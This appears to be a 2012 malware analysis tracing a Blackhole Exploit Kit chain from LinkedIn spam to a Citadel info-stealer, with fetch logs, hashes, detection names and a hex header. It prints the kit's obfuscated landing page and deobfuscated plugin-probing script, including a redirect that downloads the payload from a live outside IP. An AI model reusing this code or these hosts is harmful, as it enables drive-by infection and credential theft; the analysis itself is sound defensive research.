BHEK2 w/ e,f PluginDetect Param, Drop Trojan/Stealer/DLoader

===========================================
#MalwareMustDie!!!!!!!!!!
INFECTION OF CITADEL WITH BHEK
BHEK IS USING PARAMETER e & f
Exploit Method: AcroPDF.PDF
Payload download Method: Msxml2.XMLHTTP
Payload : Citadel/Trojan Password/InfoStealer
VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/
===========
Only VT6/43 !!!!
==========
DrWeb                    : Trojan.PWS.Stealer.946
Norman                   : W32/Krypt.GB
McAfee-GW-Edition        : PWS-Zbot.gen.aln
McAfee                   : PWS-Zbot.gen.aln
Fortinet                 : W32/Kryptik.WDV!tr
Panda                    : Suspicious file
Summary:
This trojan send the data of infected PC by crypted communication via
HTTP to 108.178.59.34 (See network conn report below)
And also downloading other malwares:
* GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
* GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
----------------------------
Set of infected file:
----------------------------
assure_numb_engineers.php  0f4f3526dd2bad681586a90fc579f6e2
index.html.2               ad967ba32c54c59db0f4a947410d96f2
js.js                      d20a786ec45f68eb56f15a589c566b27
js.js.1                    d20a786ec45f68eb56f15a589c566b27
js.js.2                    d20a786ec45f68eb56f15a589c566b27
LinkEdIn-Spam.eml          d8c4d95479f7a1264457a8d1b5e5f457
update_flash_player.exe    bb53221e4220466c876dbfad9cede066
PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg

===========================================
FULL ANALYSYS / #MalwareMustDie / @unixfreaxjp
===========================================

//Likedin Spam;
http://pastebin.com/raw.php?i=n7rppRJY
#Hint from @Xylit0l < Merci!!!!!!!!

//infected url detected:
...Privately</span></a></div></td></tr></table>
(LINE 170):                         <a href="http://www.nikecup.net/MSmxYk/index.html" style="color:#006699;
         font-family:Arial,sans-serif;font-size:12px;text-decoration:none">Chase Mathis</a>
---------------------------------------
//download PoC
--12:24:18--  http://www.nikecup.net/MSmxYk/index.html
           => `index.html.2'
Resolving www.nikecup.net... 62.149.131.163
Connecting to www.nikecup.net|62.149.131.163|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 422 [text/html]
12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422]


--------------------------------
// cat the mess
<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
<script type="text/javascript" src="http://alpuyecamorelos.com/dycYbDyw/js.js"></script>
<script type="text/javascript" src="http://videorender.com.ar/kSWEngwv/js.js"></script>
<script type="text/javascript" src="http://jbrnh.com/3ZKtSw8d/js.js"></script>

</html>

----------------------------------
// fetch the js.js, noted: referer


--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target"http://jbrnh.com/3ZKtSw8d/js.js"


--12:30:38--  http://alpuyecamorelos.com/dycYbDyw/js.js
           => `js.js'
Resolving alpuyecamorelos.com... 209.62.88.194
Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:30:38 (2.29 MB/s) - `js.js' saved [73/73]


--12:31:06--  http://videorender.com.ar/kSWEngwv/js.js
           => `js.js.1'
Resolving videorender.com.ar... 174.37.144.224
Connecting to videorender.com.ar|174.37.144.224|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/javascript]
12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73]


--12:31:26--  http://jbrnh.com/3ZKtSw8d/js.js
           => `js.js.2'
Resolving jbrnh.com... 184.168.101.248
Connecting to jbrnh.com|184.168.101.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73 [application/x-javascript]
12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73]

// all same contents↑

-----------------------------
// cat the mess (js.js)

document.location='http://108.178.59.34/links/assure_numb_engineers.php';

----------------------------
// fetch the mess, noted: referer, user agent

--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://www.nikecup.net/MSmxYk/index.html"
--target="http://108.178.59.34/links/assure_numb_engineers.php"

--12:32:46--  http://108.178.59.34/links/assure_numb_engineers.php
           => `assure_numb_engineers.php'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474]

----------------------------
// Voila..plugin Detect...in blurp..

<html><head><title></title></head><body><div dqa="asd"></div><scri
0-9a-z]/g,k);};g="getEleme";p=parseInt;cc="co";ss=String.fromCharC
nction asd(){e=window["eval"];e(s);}ddd="ad".substr(1);sss="sub"+"
(i);};g+="ntB"+"yId";</script><u id="google" 45="1b43391a(1b454545
c%3r3k393p1s)31331e3o3r#3k2r2g3c3r*3k393p1s3c!3r3k393q3f^3l3k1a371
@2g3l373a3b&3a213q3o3r+3b1t371g39%373i3i253o)3o37411a37#1g2r2g3c3r
37411a371g$2r2g3c3r3k(393p1b1t3f@3c1a371g3l&3k283" 37="383i3b3a18_
p3q373q3r&3p211f1k1t+3o3b3q3r3o%3k12374537)1g3p3q373q#3r3p211j1t*3
3c3r3k39$3q3f3l3k1a(381e371b43@3s373o1239&213q3e3f3p+1t3f3c1a39%1g
f3p2a3r!3k391a381b^44441a391g_3f3p253o3o$37411a381b(181" 40="s*1i1
3b433f$3c1a381g3f(3p2a3r3k39@1a391b1b43&391a381b45+45451e3d3b%3q2q
s141e!141e16163d^3b3q2q3b3o_3p3f3l3k1s$3c3r3k393q(3f3l3k1a37@1b433
  :
  :
3o141e142n@393o3f3m3q&3f3k3d1g28+3f393q
13216331h%1e39213q3e)3f3p1t3c3l#3o1a371
1g3p3i3f@393b1a1k1b&1t3f3c1a3d+1g3i3b3k
a3b3i3b_3q3b123c31$3733454539(373q393e1
21)1a3g1g3d3b#3q293i3b3j*3b3k3q3p26!412
f&3c1a3d1b43+3f3c1a3d1g%3c3f3o3p3q)273e
$3l3o3b1b1b(433d1g3f3k@3p3b3o3q26&3b3c3
>
if(020==0x10)d=document;
try{(d+"523")()}catch(dsgdsg){a=d[g](gg
s="";
for(i=0;;i++){
	window.asd2();
	if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x1e;
for(i=0;i<a.length;i+=2){
	s+=ss(p(a[sss](i,2),qa));
}
asd();
		</script></body></html>


--------------------------------------------------------

// deobfs the code


try {
  var PluginDetect = {
    version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
      return function (){
        c(b, a)
      }
    }
    , isDefined : function (b){
      return typeof b != "undefined"
    }
    , isArray : function (b){
      return (/array/i).test(Object.prototype.toString.call(b))
    }
    , isFunc : function (b){
      return typeof b == "function"
    }
    , isString : function (b){
      return typeof b == "string"
    }
    , isNum : function (b){
      return typeof b == "number"
    }
    , isStrNum : function (b){
      return (typeof b == "string" && (/\d/).test(b))
    }
    , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,
    getNum : function (b, c){
      var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
      exec(b) : null;
      return a ? a[0] : null
    }
    , compareNums : function (h, f, d){
      var e = this , c, b, a, g = parseInt;
      if (e.isStrNum(h) && e.isStrNum(f)){
        if (e.isDefined(d) && d.compareNums){
          return d.compareNums(h, f)
        }
        c = h.split(e.splitNumRegx);
        b = f.split(e.splitNumRegx);
        for (a = 0; a < Math.min(c.length, b.length);
        a ++ ){
          if (g(c[a], 10) > g(b[a], 10)){
            return 1
          }
          if (g(c[a], 10) < g(b[a], 10)){
            return  - 1
          }
        }
      }
      return 0
    }
    , formatNum : function (b, c){
      var d = this , a, e;
      if (!d.isStrNum(b)){
        return null
      }
      if (!d.isNum(c)){
        c = 4
      }
      c--;
      e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
      for (a = 0; a < 4; a ++ ){
        if (/^(0+)(.+)$/.test(e[a])){
          e[a] = RegExp.$2
        }
        if (a > c ||! (/\d/).test(e[a])){
          e[a] = "0"
        }
      }
      return e.slice(0, 4).join(",")
    }
    , $$hasMimeType : function (a){
      return function (c){
        if (!a.isIE && c){
          var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
          for (b = 0; b < d.length; b ++ ){
            if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){
              f = navigator.mimeTypes[d[b]];
              e = f ? f.enabledPlugin : 0;
              if (e && (e.name || e.description)){
                return f
              }
            }
          }
        }
        return null
      }
    }
    , findNavPlugin : function (l, e, c){
      var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ?
      new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
      for (f = 0; f < a.length; f ++ ){
        m = a[f].description || g;
        b = a[f].name || g;
        if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
        test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
          if (!k ||! (k.test(m) || k.test(b))){
            return a[f]
          }
        }
      }
      return null
    }
    , getMimeEnabledPlugin : function (k, m, c){
      var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
      l, d, j = e.isString(k) ? [k] : k;
      for (d = 0; d < j.length; d ++ ){
        if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
          l = f.description || h;
          a = f.name || h;
          if (b.test(l) || b.test(a)){
            if (!g ||! (g.test(l) || g.test(a))){
              return f
            }
          }
        }
      }
      return 0
    }
    , getPluginFileVersion : function (f, b){
      var h = this , e, d, g, a, c =- 1;
      if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
        return b
      }
      if (!b){
        return e
      }
      e = h.formatNum(e);
      b = h.formatNum(b);
      d = b.split(h.splitNumRegx);
      g = e.split(h.splitNumRegx);
      for (a = 0; a < d.length; a ++ ){
        if (c >- 1 && a > c && d[a] != "0"){
          return b
        }
        if (g[a] != d[a]){
          if (c ==- 1){
            c = a
          }
          if (d[a] != "0"){
            return b
          }
        }
      }
      return e
    }
    , AXO : window.ActiveXObject, getAXO : function (a){
      var f = null, d, b = this , c = {
      }
      ;
      try {
        f = new b.AXO(a)
      }
      catch (d){
      }
      return f
    }
    , convertFuncs : function (f){
      var a, g, d, b =/^ [ \ $][ \ $] /, c = this ;
      for (ain f){
        if (b.test(a)){
          try {
            g = a.slice(2);
            if (g.length > 0 &&! f[g]){
              f[g] = f[a](f);
              deletef[a]
            }
          }
          catch (d){
          }
        }
      }
    }
    , initObj : function (e, b, d){
      var a, c;
      if (e){
        if (e[b[0]] == 1 || d){
          for (a = 0; a < b.length; a = a + 2){
            e[b[a]] = b[a + 1]
          }
        }
        for (ain e){
          c = e[a];
          if (c && c[b[0]] == 1){
            this .initObj(c, b)
          }
        }
      }
    }
    , initScript : function (){
      var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
      b = a.platform || "", h = a.product || "";
      c.initObj(c, ["$", c]);
      for (fin c.Plugins){
        if (c.Plugins[f]){
          c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
        }
      }
      ;
      c.OS = 100;
      if (b){
        var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
        21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
        , 100];
        for (f = d.length - 2; f >= 0; f = f - 2){
          if (d[f] && new RegExp(d[f], "i").test(b)){
            c.OS = d[f + 1];
            break
          }
        }
      }
      c.convertFuncs(c);
      c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
      "body")[0] || document.body || null);
      c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
      c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
      null      ;
      c.ActiveXEnabled = false;
      if (c.isIE){
        var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
        "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
        "Scripting.Dictionary", "wmplayer.ocx"];
        for (f = 0; f < j.length; f ++ ){
          if (c.getAXO(j[f])){
            c.ActiveXEnabled = true;
            break
          }
        }
      }
      c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
      c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
      "0.9") : null;
      c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
      c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
      c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
      /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
      c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
      RegExp.$1) : null;
      c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
      c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
      parseFloat(RegExp.$1, 10) : null;
      c.addWinEvent("load", c.handler(c.runWLfuncs, c))
    }
    , init : function (d){
      var c = this , b, d, a = {
        status :- 3, plugin : 0
      }
      ;
      if (!c.isString(d)){
        return a
      }
      if (d.length == 1){
        c.getVersionDelimiter = d;
        return a
      }
      d = d.toLowerCase().replace(/\s/g, "");
      b = c.Plugins[d];
      if (!b ||! b.getVersion){
        return a
      }
      a.plugin = b;
      if (!c.isDefined(b.installed)){
        b.installed = null;
        b.version = null;
        b.version0 = null;
        b.getVersionDone = null;
        b.pluginName = d
      }
      c.garbage = false;
      if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
        a.status =- 2;
        return a
      }
      a.status = 1;
      return a
    }
    , fPush : function (b, a){
      var c = this ;
      if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
      ])))){
        a.push(b)
      }
    }
    , callArray : function (b){
      var c = this , a;
      if (c.isArray(b)){
        for (a = 0; a < b.length; a ++ ){
          if (b[a] === null){
            return
          }
          c.call(b[a]);
          b[a] = null
        }
      }
    }
    , call : function (c){
      var b = this , a = b.isArray(c) ? c.length :- 1;
      if (a > 0 && b.isFunc(c[0])){
        c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
      }
      else {
        if (b.isFunc(c)){
          c(b)
        }
      }
    }
    , getVersionDelimiter : ",", $$getVersion : function (a){
      return function (g, d, c){
        var e = a.init(g), f, b, h = {
        }
        ;
        if (e.status < 0){
          return null
        }
        ;
        f = e.plugin;
        if (f.getVersionDone != 1){
          f.getVersion(null, d, c);
          if (f.getVersionDone === null){
            f.getVersionDone = 1
          }
        }
        a.cleanup();
        b = (f.version || f.version0);
        b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
        return b
      }
    }
    , cleanup : function (){
    }
    , addWinEvent : function (d, c){
      var e = this , a = window, b;
      if (e.isFunc(c)){
        if (a.addEventListener){
          a.addEventListener(d, c, false)
        }
        else {
          if (a.attachEvent){
            a.attachEvent("on" + d, c)
          }
          else {
            b = a["on" + d];
            a["on" + d] = e.winHandler(c, b)
          }
        }
      }
    }
    , winHandler : function (d, c){
      return function (){
        d();
        if (typeof c == "function"){
          c()
        }
      }
    }
    , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
      var b = {
      }
      ;
      a.winLoaded = true;
      a.callArray(a.WLfuncs0);
      a.callArray(a.WLfuncs);
      if (a.onDoneEmptyDiv){
        a.onDoneEmptyDiv()
      }
    }
    , winLoaded : false, $$onWindowLoaded : function (a){
      return function (b){
        if (a.winLoaded){
          a.call(b)
        }
        else {
          a.fPush(b, a.WLfuncs)
        }
      }
    }
    , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
    function (){
      var d = this , b, h, c, a, f, g;
      if (d.div && d.div.childNodes){
        for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
          c = d.div.childNodes[b];
          if (c && c.childNodes){
            for (h = c.childNodes.length - 1; h >= 0; h -- ){
              g = c.childNodes[h];
              try {
                c.removeChild(g)
              }
              catch (f){
              }
            }
          }
          if (c){
            try {
              d.div.removeChild(c)
            }
            catch (f){
            }
          }
        }
      }
      if (!d.div){
        a = document.getElementById(d.divID);
        if (a){
          d.div = a
        }
      }
      if (d.div && d.div.parentNode){
        try {
          d.div.parentNode.removeChild(d.div)
        }
        catch (f){
        }
        d.div = null
      }
    }
    , DONEfuncs : [], onDoneEmptyDiv : function (){
      var c = this , a, b;
      if (!c.winLoaded){
        return
      }
      if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
        return
      }
      for (ain c){
        b = c[a];
        if (b && b.funcs){
          if (b.OTF == 3){
            return
          }
          if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
            return
          }
        }
      }
      for (a = 0; a < c.DONEfuncs.length; a ++ ){
        c.callArray(c.DONEfuncs)
      }
      c.emptyDiv()
    }
    , getWidth : function (c){
      if (c){
        var a = c.scrollWidth || c.offsetWidth, b = this ;
        if (b.isNum(a)){
          return a
        }
      }
      return  - 1
    }
    , getTagStatus : function (m, g, a, b){
      var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
      g.span, i = c.getWidth(d);
      if (!k ||! h ||! d ||! c.getDOMobj(m)){
        return  - 2
      }
      if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
        return 0
      }
      if (l >= i){
        return  - 1
      }
      try {
        if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
          if (!m.winLoaded && c.winLoaded){
            return 1
          }
          if (m.winLoaded && c.isNum(b)){
            if (!c.isNum(m.count)){
              m.count = b
            }
            if (b - m.count >= 10){
              return 1
            }
          }
        }
      }
      catch (f){
      }
      return 0
    }
    , getDOMobj : function (g, a){
      var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
      try {
        if (b && a){
          d.div.focus()
        }
      }
      catch (f){
      }
      return b ? c.firstChild : null
    }
    , setStyle : function (b, g){
      var f = b.style, a, d, c = this ;
      if (f && g){
        for (a = 0; a < g.length; a = a + 2){
          try {
            f[g[a]] = g[a + 1]
          }
          catch (d){
          }
        }
      }
    }
    , insertDivInBody : function (a, i){
      var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
      document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
      if (!g){
        try {
          j.write(c + 'div id="' + b + '">o' + c + "/div>");
          d = j.getElementById(b)
        }
        catch (h){
        }
      }
      g = (j.getElementsByTagName("body")[0] || j.body);
      if (g){
        if (g.firstChild && f.isDefined(g.insertBefore)){
          g.insertBefore(a, g.firstChild)
        }
        else {
          g.appendChild(a)
        }
        if (d){
          g.removeChild(d)
        }
      }
      else {
      }
    }
    , insertHTML : function (g, b, h, a, l){
      var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
      var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
      "0px", "visibility", "visible"];
      var i =
      "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
      if (!k.isDefined(a)){
        a = ""
      }
      if (k.isString(g) && (/[^\s]/).test(g)){
        g = g.toLowerCase().replace(/\s/g, "");
        q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
        q += 'style="' + i + 'display:inline;" ';
        for (o = 0; o < b.length; o = o + 2){
          if (/[^\s]/.test(b[o + 1])){
            q += b[o] + '="' + b[o + 1] + '" '
          }
        }
        q += ">";
        for (o = 0; o < h.length; o = o + 2){
          if (/[^\s]/.test(h[o + 1])){
            q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
          }
        }
        q += a + f + "/" + g + ">"
      }
      else {
        q = a
      }
      if (!k.div){
        j = n.getElementById(k.divID);
        if (j){
          k.div = j
        }
        else {
          k.div = n.createElement("div");
          k.div.id = k.divID
        }
        k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
        3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
         + "px", "verticalAlign", "baseline", "display", "block"]));
        if (!j){
          k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
          k.insertDivInBody(k.div)
        }
      }
      if (k.div && k.div.parentNode){
        k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
        pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
        try {
          p.innerHTML = q
        }
        catch (m){
        }
        ;
        try {
          k.div.appendChild(p)
        }
        catch (m){
        }
        ;
        return {
          span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
        }
      }
      return {
        span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
      }
    }
    , Plugins : {
      adobereader : {
        mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
        "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
        {
        }
        , pluginHasMimeType : function (d, c, f){
          var b = this , e = b.$, a;
          for (ain d){
            if (d[a] && d[a].type && d[a].type == c){
              return 1
            }
          }
          if (e.getMimeEnabledPlugin(c, f)){
            return 1
          }
          return 0
        }
        , getVersion : function (l, j){
          var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
          if (d.isString(j)){
            j = j.replace(/\s/g, "");
            if (j){
              k = j
            }
          }
          else {
            j = null
          }
          if (d.isDefined(g.INSTALLED[k])){
            g.installed = g.INSTALLED[k];
            return
          }
          if (!d.isIE){
            a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
            if (g.getVersionDone !== 0){
              g.getVersionDone = 0;
              b = d.getMimeEnabledPlugin(g.mimeType, a);
              if (!j){
                n = b
              }
              if (!b && d.hasMimeType(g.mimeType)){
                b = d.findNavPlugin(a, 0)
              }
              if (b){
                g.navPluginObj = b;
                h = d.getNum(b.description) || d.getNum(b.name);
                h = d.getPluginFileVersion(b, h);
                if (!h && d.OS == 1){
                  if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
                    h = "9"
                  }
                  else {
                    if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
                      h = "8"
                    }
                  }
                }
              }
            }
            else {
              h = g.version
            }
            if (!d.isDefined(n)){
              n = d.getMimeEnabledPlugin(k, a)
            }
            g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
          }
          else {
            b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
            c =/=\ s * ([ \ d \ .] + ) / g;
            try {
              f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
              ""], "", g))).GetVersions();
              for (m = 0; m < 5; m ++ ){
                if (c.test(f) && (!h || RegExp.$1 > h)){
                  h = RegExp.$1
                }
              }
            }
            catch (i){
            }
            g.installed = h ? 1 : (b ? 0 :- 1)
          }
          if (!g.version){
            g.version = d.formatNum(h)
          }
          g.INSTALLED[k] = g.installed
        }
      }
      , zz : 0
    }
  }
  ;
  PluginDetect.initScript();
  PluginDetect.getVersion(".");
  pdfver = PluginDetect.getVersion("AdobeReader");
}
catch (e){
}
if (typeof pdfver == 'string'){
  pdfver = pdfver.split('.')
}
else {
  pdfver = [0, 0, 0, 0]
}
function x(s){
  d = [];
  for (i = 0; i < s.length; i ++ ){
    k = (s.charCodeAt(i) - 46).toString(16);
    if (k.length == 1)k = "0" + k;
    d.push(k);
  }
  ;
  return d.join("");
}
end_redirect = function (){
  window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';
}
;
window.onbeforeunload = function (){
  return "";
}
;
document.write('');
setTimeout(end_redirect, 60000);


------------------------------------
// infection analysis per exploit & PluginDetect hint..
===================
EXPLOIT-ED BY:
===================
//    , Plugins : {
//      adobereader : {
//        mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
//        "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :

===================
DOWNLOADED VIA:
===================
//        var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
//        "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
//        "Scripting.Dictionary", "wmplayer.ocx"];
//        for (f = 0; f < j.length; f ++ ){
//          if (c.getAXO(j[f])){
//            c.ActiveXEnabled = true;
//            break

*********** Please be noted parameter = var f, j *****************

===================
TO URL:
===================
//   end_redirect = function (){
//   window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';}
//

--------------download PoC------------------------------------------------

--user-agent="Mozilla/5.0 (X11; U; NetBSD i686)"
--referer="http://108.178.59.34/links/assure_numb_engineers.php"
--target="http://108.178.59.34/adobe/update_flash_player.exe"

--12:40:16--  http://108.178.59.34/adobe/update_flash_player.exe
           => `update_flash_player.exe'
Connecting to 108.178.59.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 150,616 (147K) [application/octet-stream]
12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD


---------------INFECTION CROSS REFERENCE AUTOMATION------------------
[2012-10-17 12:42:46] [MongoDB] MongoDB instance not available
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None)
[2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27)
[2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)
[2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html)
[2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb)


-----------------------------

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
